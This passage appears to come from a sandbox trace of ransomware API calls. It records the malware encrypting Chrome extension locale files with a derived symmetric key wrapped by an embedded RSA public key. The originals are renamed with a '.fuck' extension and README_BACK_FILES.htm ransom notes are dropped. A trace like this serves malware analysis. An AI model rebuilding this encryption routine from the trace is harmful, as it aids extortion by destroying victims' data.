data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json")) returned 0x20 [0259.315] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json", dwFileAttributes=0x80) returned 1 [0259.315] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.316] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.317] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.317] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.319] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.319] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.319] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb468, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.319] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c5c0) returned 1 [0259.319] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.319] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.319] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6d190) returned 1 [0259.320] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6d190, dwCertEncodingType=0x1, pInfo=0x2e278d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e27900*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e27908*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7c780) returned 1 [0259.320] CryptEncrypt (in: hKey=0x2e7c780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.320] CryptEncrypt (in: hKey=0x2e7c780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6c3c0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6c3c0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.320] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6c3c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6c3c0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.321] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x2c6, lpOverlapped=0x0) returned 1 [0259.322] CryptEncrypt (in: hKey=0x2e7c5c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2c6, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2d0) returned 1 [0259.322] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x2d0, lpOverlapped=0x0) returned 1 [0259.326] CloseHandle (hObject=0x5d60) returned 1 [0259.326] CloseHandle (hObject=0x5d5c) returned 1 [0259.326] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json"), bFailIfExists=0) returned 1 [0259.329] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json", dwFileAttributes=0x0) returned 1 [0259.329] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.gsg")) returned 1 [0259.330] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.fuck")) returned 1 [0259.331] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.331] CryptDestroyKey (hKey=0x2e7c5c0) returned 1 [0259.331] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.331] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.332] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.332] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\readme_back_files.htm")) returned 0xffffffff [0259.332] AreFileApisANSI () returned 1 [0259.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.332] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.333] GetFileType (hFile=0x5d64) returned 0x1 [0259.333] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.334] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.334] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.335] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.335] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.335] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.335] GetLastError () returned 0x0 [0259.335] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json")) returned 0x20 [0259.335] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json", dwFileAttributes=0x80) returned 1 [0259.336] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.336] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.340] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.341] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.343] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.343] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.343] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.343] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c5c0) returned 1 [0259.343] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.343] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.343] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6c448) returned 1 [0259.344] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6c448, dwCertEncodingType=0x1, pInfo=0x2e279a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e279d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e279d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7c700) returned 1 [0259.344] CryptEncrypt (in: hKey=0x2e7c700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.344] CryptEncrypt (in: hKey=0x2e7c700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6c558*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6c558*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.344] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e6c558*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6c558*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.345] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x269, lpOverlapped=0x0) returned 1 [0259.347] CryptEncrypt (in: hKey=0x2e7c5c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x269, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x270) returned 1 [0259.347] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x270, lpOverlapped=0x0) returned 1 [0259.364] CloseHandle (hObject=0x5d5c) returned 1 [0259.364] CloseHandle (hObject=0x5d60) returned 1 [0259.364] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json"), bFailIfExists=0) returned 1 [0259.367] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json", dwFileAttributes=0x0) returned 1 [0259.368] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.gsg")) returned 1 [0259.369] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.fuck")) returned 1 [0259.370] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.370] CryptDestroyKey (hKey=0x2e7c5c0) returned 1 [0259.370] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.370] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.370] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.370] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\readme_back_files.htm")) returned 0xffffffff [0259.371] AreFileApisANSI () returned 1 [0259.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.371] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.372] GetFileType (hFile=0x5d64) returned 0x1 [0259.372] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.373] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.373] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.374] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.374] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.374] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.374] GetLastError () returned 0x0 [0259.374] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json")) returned 0x20 [0259.374] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json", dwFileAttributes=0x80) returned 1 [0259.374] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.375] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.376] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.377] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.379] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.379] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.379] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.379] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c440) returned 1 [0259.379] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.379] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.379] CryptAcquireContextA (in: 